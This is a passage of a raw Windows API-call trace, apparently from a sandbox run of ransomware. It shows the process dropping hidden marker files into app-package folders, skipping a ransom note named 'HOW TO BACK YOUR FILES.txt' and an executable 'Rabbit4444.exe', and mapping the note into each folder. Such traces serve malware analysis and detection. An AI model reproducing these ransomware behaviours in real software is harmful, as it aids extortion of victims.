lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\RoamingState" [0066.894] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108688 | out: hHeap=0xe0000) returned 1 [0066.894] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121fa0 | out: hHeap=0xe0000) returned 1 [0066.894] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\RoamingState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\RoamingState" [0066.894] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\RoamingState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\RoamingState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\RoamingState\\" [0066.894] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\RoamingState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3" [0066.894] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.holographicfirstrun_cw5n1h2txyewy\\roamingstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.895] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.898] FlushFileBuffers (hFile=0x228) returned 1 [0066.899] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.899] CloseHandle (hObject=0x228) returned 1 [0066.899] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\RoamingState") returned 103 [0066.899] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.899] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\RoamingState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75dff3f8, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75dff3f8, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf131c67c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0066.900] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.900] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.900] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.900] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.900] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75dff3f8, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75dff3f8, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf131c67c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.900] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.900] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.900] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.900] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.900] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.900] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf131c67c, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf131c67c, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf131c67c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.900] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.900] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.900] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf131c67c, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf131c67c, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf131c67c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.900] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0066.900] lstrcpyW (in: lpString1=0x130ec08, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.900] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\RoamingState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.holographicfirstrun_cw5n1h2txyewy\\roamingstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.901] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.901] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.901] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.902] CloseHandle (hObject=0x27c) returned 1 [0066.902] CloseHandle (hObject=0x228) returned 1 [0066.902] GetCurrentThreadId () returned 0xd98 [0066.902] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1221a8 [0066.902] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\LocalState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\LocalState" [0066.902] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108760 | out: hHeap=0xe0000) returned 1 [0066.902] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1221a0 | out: hHeap=0xe0000) returned 1 [0066.902] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\LocalState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\LocalState" [0066.902] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\LocalState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\LocalState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\LocalState\\" [0066.902] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\LocalState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3" [0066.902] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.holographicfirstrun_cw5n1h2txyewy\\localstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.905] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.907] FlushFileBuffers (hFile=0x228) returned 1 [0066.908] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.908] CloseHandle (hObject=0x228) returned 1 [0066.909] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\LocalState") returned 101 [0066.909] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.909] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\LocalState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75dff3f8, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75dff3f8, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf13421a5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1028d0 [0066.909] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.909] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.909] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.909] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.909] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75dff3f8, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75dff3f8, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf13421a5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.909] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.909] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.909] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.909] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.909] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.909] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf13421a5, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf13421a5, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf13421a5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.909] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.909] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.909] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf13421a5, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf13421a5, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf13421a5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.910] FindClose (in: hFindFile=0x1028d0 | out: hFindFile=0x1028d0) returned 1 [0066.910] lstrcpyW (in: lpString1=0x130ec04, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.910] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\LocalState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.holographicfirstrun_cw5n1h2txyewy\\localstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.910] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.910] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.911] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.911] CloseHandle (hObject=0x27c) returned 1 [0066.911] CloseHandle (hObject=0x228) returned 1 [0066.911] GetCurrentThreadId () returned 0xd98 [0066.911] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121f88 [0066.911] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\LocalCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\LocalCache" [0066.911] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108838 | out: hHeap=0xe0000) returned 1 [0066.911] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121f80 | out: hHeap=0xe0000) returned 1 [0066.911] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\LocalCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\LocalCache" [0066.911] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\LocalCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\LocalCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\LocalCache\\" [0066.911] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\LocalCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3" [0066.911] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.holographicfirstrun_cw5n1h2txyewy\\localcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.912] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.915] FlushFileBuffers (hFile=0x228) returned 1 [0066.915] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.916] CloseHandle (hObject=0x228) returned 1 [0066.916] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\LocalCache") returned 101 [0066.916] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.916] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\LocalCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75dff3f8, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75dff3f8, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf13421a5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0066.917] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.917] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.917] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.917] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.917] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75dff3f8, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75dff3f8, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf13421a5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.917] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.917] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.917] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.917] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.917] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.917] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf13421a5, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf13421a5, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf13421a5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.917] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.917] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.917] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf13421a5, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf13421a5, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf13421a5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.917] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0066.917] lstrcpyW (in: lpString1=0x130ec04, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.917] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\LocalCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.holographicfirstrun_cw5n1h2txyewy\\localcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.918] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.918] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.918] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.918] CloseHandle (hObject=0x27c) returned 1 [0066.918] CloseHandle (hObject=0x228) returned 1 [0066.918] GetCurrentThreadId () returned 0xd98 [0066.918] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222c8 [0066.918] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AppData" [0066.918] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116110 | out: hHeap=0xe0000) returned 1 [0066.918] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222c0 | out: hHeap=0xe0000) returned 1 [0066.918] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AppData" [0066.918] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AppData\\" [0066.918] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3" [0066.918] CreateFileW 